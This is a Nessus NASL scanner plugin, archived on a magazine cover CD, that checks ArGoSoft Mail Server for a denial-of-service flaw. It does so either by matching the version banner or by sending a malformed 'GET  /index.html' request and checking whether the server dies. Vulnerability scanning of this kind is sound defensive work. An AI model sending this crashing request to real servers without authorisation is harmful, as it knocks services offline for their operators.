home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / argosoft_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  72 lines
  1. #
  2. # (C) Tenable Network Security
  3. #
  4. # From: "Rushjo@tripbit.org" <rushjo@tripbit.org>
  5. # To: bugtraq@security-focus.com
  6. # Subject: Denial of Service Attack against ArGoSoft Mail Server Version 1.8 
  8.  
  9.  
  10.  
  11. if(description)
  12. {
  13.   script_id(11734);
  14.   
  15.   script_version ("$Revision: 1.2 $");
  16.   name["english"] = "Argosoft DoS";
  17.   script_name(english:name["english"]);
  18.  
  19.   desc["english"] = "
  20. It was possible to kill the remote HTTP server
  21. sending an invalid request to it ('GET  /index.html\n\n').
  22.  
  23. A cracker may exploit this vulnerability to make your web server
  24. crash continually or even execute arbitrary code on your system.
  25.  
  26. Solution : upgrade your software to the latest version
  27. Risk factor : High";
  28.  
  29.   script_description(english:desc["english"]);
  30.  
  31.   summary["english"] = "Bad HTTP request";
  32.   script_summary(english:summary["english"]);
  33.  
  34.   script_category(ACT_MIXED_ATTACK);
  35.  
  36.   script_copyright(english:"This script is Copyright (C) 2003 Tenable Network Security");
  37.   family["english"] = "Denial of Service";
  38.   script_family(english:family["english"]);
  39.   script_require_ports("Services/www", 80);
  40.   script_dependencie("find_service.nes", "httpver.nasl", "http_version.nasl");
  41.   exit(0);
  42. }
  43.  
  44. ########
  45.  
  46. include("http_func.inc");
  47.  
  48. port = get_http_port(default:80);
  49.  
  50. if(! get_port_state(port)) exit(0);
  51.  
  52. if( safe_checks() )
  53. {
  54.  banner = get_http_banner(port:port);
  55.  if(egrep(pattern:"^Server: ArGoSoft Mail Server.*.1\.([0-7]\..*|8\.([0-2]\.|3\.[0-5]))", string:banner))
  56.      {
  57.     security_hole(port);
  58.     }
  59.  exit(0);    
  60. }
  61.  
  62. if (http_is_dead(port: port)) exit(0);
  63.  
  64. soc = open_sock_tcp(port);
  65. if(! soc) exit(0);
  66.  
  67. send(socket:soc, data:'GET  /index.html\n\n');
  68. r = recv_line(socket:soc, length:2048);
  69. close(soc);
  70.  
  71. if (http_is_dead(port: port)) {  security_hole(port); exit(0); }
  72.